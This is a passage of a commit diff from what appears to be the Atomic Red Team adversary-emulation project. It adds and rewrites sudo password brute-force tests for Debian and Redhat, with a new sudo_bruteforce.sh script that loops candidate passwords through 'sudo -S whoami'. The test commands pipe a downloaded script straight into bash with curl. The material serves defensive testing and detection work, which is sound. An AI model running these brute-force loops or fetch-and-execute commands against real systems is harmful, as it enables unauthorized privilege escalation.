for P in ${PASSWORDS[@]}; do \
date +"%b %d %T"; \
sudo -k && echo "$P" |sudo -S whoami &>/tmp/file; \
echo "exit: $?"; \
if grep -q "root" /tmp/file; then \
echo "FOUND: sudo => $P"; break; \
else \
echo "TRIED: $P"; \
fi; \
sleep 2; \
done; \
rm /tmp/file
```
#### Cleanup Commands:
```sh
userdel target
```
#### Dependencies: Run with `sh`!
##### Description: Check if running on a Redhat based machine.
##### Check Prereq Commands:
```sh
if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi
if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi
```
##### Get Prereq Commands:
```sh
yum -y update && yum install -y openssl sudo
```
<br/>
<br/>
## Atomic Test #6 - Password Brute User using Kerbrute Tool
## Atomic Test #4 - Password Brute User using Kerbrute Tool
Bruteforce a single user's password from a wordlist
**Supported Platforms:** Windows
@@ -366,4 +251,120 @@ invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/at
<br/>
<br/>
## Atomic Test #5 - SUDO Brute Force - Debian
An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user.
This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
**Supported Platforms:** Linux
**auto_generated_guid:** ba1bf0b6-f32b-4db0-b7cc-d78cacc76700
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_url | url of remote payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art
su art
cd /tmp
curl -s #{remote_url} |bash
```
#### Cleanup Commands:
```bash
userdel -fr art
```
#### Dependencies: Run with `bash`!
##### Description: Check if running on a Debian based machine.
##### Check Prereq Commands:
```bash
if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
```
##### Get Prereq Commands:
```bash
apt update && apt install -y openssl sudo curl
```
<br/>
<br/>
## Atomic Test #6 - SUDO Brute Force - Redhat
An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user.
This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
**Supported Platforms:** Linux
**auto_generated_guid:** 4097bc00-5eeb-4d56-aaf9-287d60351d95
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_url | url of remote payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art
su art
cd /tmp
curl -s #{remote_url} |bash
```
#### Cleanup Commands:
```bash
userdel -fr art
```
#### Dependencies: Run with `bash`!
##### Description: Check if running on a Redhat based machine.
##### Check Prereq Commands:
```bash
if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "RedHat"; else echo "NOT RedHat"; exit 1; fi
if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
```
##### Get Prereq Commands:
```bash
yum update && yum install -y openssl sudo curl
```
<br/>
atomics/T1110.001/T1110.001.yaml
+74 -70
View File
@@ -117,76 +117,6 @@ atomic_tests:
}
Write-Host "End of bruteforce"
- name: SUDO brute force Debian
auto_generated_guid: 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a
description: |
Attempts to sudo with current user using passwords from a list. Will run sudo 3 times, each with 3 different password attempts.
PreRequisites : debian,ubuntu,kali and pam_tally NOT configured.
If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers.
The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: |
Check if running on a Debian based machine.
prereq_command: |
if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
cp PathToAtomicsFolder/T1110.001/src/passwords.txt /tmp/workingfile
cp PathToAtomicsFolder/T1110.001/src/asker.sh /tmp/asker && chmod 755 /tmp/asker
if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
get_prereq_command: |
apt-get update && apt-get install -y sudo
executor:
elevation_required: false
command: |
for i in 1 2 3 ; do SUDO_ASKPASS=/tmp/asker sudo -k -A whoami && wc -l /tmp/workingfile; done
echo done
cleanup_command: |
rm -f /tmp/asker /tmp/workingfile
name: sh
- name: SUDO brute force Redhat
auto_generated_guid: b72958a7-53e3-4809-9ee1-58f6ecd99ade
description: |
Brute force the password of a local user account which is a member of the sudo'ers group on a Redhat based Linux distribution.
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: |
Check if running on a Redhat based machine.
prereq_command: |
if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi
if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi
get_prereq_command: |
yum -y update && yum install -y openssl sudo
executor:
elevation_required: true
command: |
useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target
su target
PASSWORDS=(one two three password five); \
touch /tmp/file; \
for P in ${PASSWORDS[@]}; do \
date +"%b %d %T"; \
sudo -k && echo "$P" |sudo -S whoami &>/tmp/file; \
echo "exit: $?"; \
if grep -q "root" /tmp/file; then \
echo "FOUND: sudo => $P"; break; \
else \
echo "TRIED: $P"; \
fi; \
sleep 2; \
done; \
rm /tmp/file
cleanup_command: |
userdel target
name: sh
- name: Password Brute User using Kerbrute Tool
auto_generated_guid: 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4
description: |
@@ -222,3 +152,77 @@ atomic_tests:
command: |
cd $env:temp
.\kerbrute.exe bruteuser --dc #{domaincontroller} -d #{domain} $env:temp\bruteuser.txt TestUser1
- name: SUDO Brute Force - Debian
auto_generated_guid: ba1bf0b6-f32b-4db0-b7cc-d78cacc76700
description: |
An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user.
This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
supported_platforms:
- linux
input_arguments:
remote_url:
description: url of remote payload
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
dependency_executor_name: bash
dependencies:
- description: |
Check if running on a Debian based machine.
prereq_command: |
if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
get_prereq_command: |
apt update && apt install -y openssl sudo curl
executor:
name: bash
elevation_required: true
command: |
useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art
su art
cd /tmp
curl -s #{remote_url} |bash
cleanup_command: |
userdel -fr art
- name: SUDO Brute Force - Redhat
auto_generated_guid: 4097bc00-5eeb-4d56-aaf9-287d60351d95
description: |
An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user.
This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
supported_platforms:
- linux
input_arguments:
remote_url:
description: url of remote payload
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
dependency_executor_name: bash
dependencies:
- description: |
Check if running on a Redhat based machine.
prereq_command: |
if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "RedHat"; else echo "NOT RedHat"; exit 1; fi
if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
get_prereq_command: |
yum update && yum install -y openssl sudo curl
executor:
name: bash
elevation_required: true
command: |
useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art
su art
cd /tmp
curl -s #{remote_url} |bash
cleanup_command: |
userdel -fr art
atomics/T1110.001/src/sudo_bruteforce.sh
+32
View File
@@ -0,0 +1,32 @@
#!/bin/bash
# This script loops through the PASSWORDS array passing each P -> password as
# --stdin to the "sudo whoami" command, then checks the resulting output for the
# username root to discover if the sudo command was passed the correct password
# or not. Note: It assumes that the current user is a member of the sudo or
# wheel group and can run sudo commands if the correct password is given.
# Manual testing
# :~$ P="one"; sudo -k && echo "$P" |sudo -S whoami
# [sudo] password for {username}: Sorry, try again.
# [sudo] password for {username}:
# sudo: no password was provided
# sudo: 1 incorrect password attempt
# :~$ P="password123"; sudo -k && echo "$P" |sudo -S whoami
# [sudo] password for {username}: root
PASSWORDS=(one two three password123 five)
touch /tmp/temp_file
for P in ${PASSWORDS[@]}
do
sudo -k && echo "$P" |sudo -S whoami &>/tmp/temp_file
if grep --quiet "root" /tmp/temp_file
then
echo "$(date +'%Y-%m-%dT%T%Z') exit: $? FOUND: sudo => $P"
break
else
echo "$(date +'%Y-%m-%dT%T%Z') exit: $? TRIED: $P"
fi
sleep 2
done
rm /tmp/temp_file
atomics/used_guids.txt
+2
View File
@@ -1266,3 +1266,5 @@ d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6
191db57d-091a-47d5-99f3-97fde53de505
20b40ea9-0e17-4155-b8e6-244911a678ac
433842ba-e796-4fd5-a14f-95d3a1970875
ba1bf0b6-f32b-4db0-b7cc-d78cacc76700
4097bc00-5eeb-4d56-aaf9-287d60351d95